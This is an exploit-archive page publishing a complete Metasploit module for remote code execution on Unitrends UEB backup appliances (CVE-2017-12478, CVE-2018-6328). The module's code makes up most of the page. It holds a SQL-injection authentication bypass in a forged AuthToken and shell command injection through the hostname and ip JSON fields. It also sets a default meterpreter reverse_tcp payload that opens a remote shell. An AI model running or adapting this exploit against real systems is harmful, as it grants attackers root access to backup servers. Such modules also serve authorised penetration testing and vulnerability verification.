exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Unitrends UEB HTTP API Remote Code Execution

Unitrends UEB HTTP API Remote Code Execution
Posted Oct 5, 2018
Authored by h00die, Benny Husted, Cale Smith, Jared Arave | Site metasploit.com

It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system. UEB v9 runs the api under root privileges and api/storage is vulnerable. UEB v10 runs the api under limited privileges and api/hosts is vulnerable.

tags | exploit, remote, web, arbitrary, root
advisories | CVE-2017-12478, CVE-2018-6328
SHA-256 | 26c3d9da1b69eb5067bf4415e099c1d16549287987fd59097875111bb16caf69

Unitrends UEB HTTP API Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB http api remote code execution',
'Description' => %q{
It was discovered that the api/storage web interface in Unitrends Backup (UB)
before 10.0.0 has an issue in which one of its input parameters was not validated.
A remote attacker could use this flaw to bypass authentication and execute arbitrary
commands with root privilege on the target system.
UEB v9 runs the api under root privileges and api/storage is vulnerable.
UEB v10 runs the api under limited privileges and api/hosts is vulnerable.
},
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave', # @iotennui
'h00die'
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'],
['EDB', '44297'],
['CVE', '2017-12478'],
['CVE', '2018-6328']
],
'Targets' =>
[
[ 'UEB 9.*', { 'Privileged' => true} ],
[ 'UEB < 10.1.0', { 'Privileged' => false} ]
],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => true
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
])
deregister_options('SRVHOST', 'SRVPORT')
end

def auth_token
session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass
Base64.strict_encode64(session) #b64 encode session token
end

def check
res = send_request_cgi!({
'method' => 'GET',
'uri' => '/api/systems/details',
'ctype' => 'application/json',
'headers' =>
{'AuthToken' => auth_token}
})
if res && res.code == 200
print_good("Good news, looks like a vulnerable version of UEB.")
return CheckCode::Appears
else
print_bad('Host does not appear to be vulnerable.')
end
return CheckCode::Safe
end

#substitue some charactes
def filter_bad_chars(cmd)
cmd.gsub!("\\", "\\\\\\")
cmd.gsub!("'", '\\"')
end

def execute_command(cmd, opts = {})
if target.name == 'UEB 9.*'
#substitue the cmd into the hostname parameter
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
parms << filter_bad_chars(cmd)
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
uri = '/api/storage'
elsif target.name == 'UEB < 10.1.0'
parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&|
parms << filter_bad_chars(cmd)
parms << %Q|`'"}|
uri = '/api/hosts'
end

res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'ctype' => 'application/json',
'encode_params' => false,
'data' => parms,
'headers' =>
{'AuthToken' => auth_token}
})

if res && res.code != 500
fail_with(Failure::UnexpectedReply,'Unexpected response')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end

def exploit
print_status("#{peer} - Sending requests to UEB...")
execute_cmdstager(:linemax => 120)
end
end

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close